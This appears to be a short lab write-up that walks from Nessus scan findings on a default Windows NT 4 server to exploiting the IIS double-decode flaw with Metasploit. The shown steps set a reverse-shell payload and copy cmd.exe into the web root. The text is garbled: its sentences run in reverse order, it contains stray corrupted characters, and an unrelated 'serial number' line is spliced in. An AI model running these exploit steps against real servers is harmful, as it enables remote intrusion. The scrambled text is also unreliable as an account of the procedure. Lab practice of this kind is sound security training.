Executing command: copy \winnt\system32\cmd.exe MJE6cgs.exe Copying cmd.exe to the web root as “MJE6cgs.exe”… Msf exploit(ms01_026_dbldecode) > exploit Msf exploit(ms01_026_dbldecode) > set PAYLOAD generic/shell_reverse_tcp Msf exploit(ms01_026_dbldecode) > set VERBOSE true Name Current Setting Required DescriptionĬMD no Execute this command instead of using command stager Module options (exploit/windows/iis/ms01_026_dbldecode): Msf exploit(ms01_026_dbldecode) > show options So as we now know the exploit module in metasploit, its time to use it If we pay attention to the nessus results, it also include with which tools its exploitable the vulnerability, just in case, I included this screenshot. MS01-044: Microsoft IIS Remote Command Execution
TH3 SERIAL NUMBER CODE
MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)ģ5362 1 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) High Severity problem(s) foundģ4477 1 MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) High Severity problem(s) foundĢ2034 1 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) High Severity problem(s) found This is an NT 4 server version (english) with all by default, it also has a normal user called greg that is actually logged into the machine, and a Real VNC 4.1.1 versionĪfter running a Nessus scan (without credentials) the general results are:Īs you can see below, these are the details of the High Severy problems:Ģ1564 1 VNC Security Type Enforcement Failure Remote Authentication Bypass High Severity problem(s) found We are going to start from the results of a Nessus scan to the complete explotation. In these little lab, we are going to review some known vulnerabilities in Windows NT 4 server.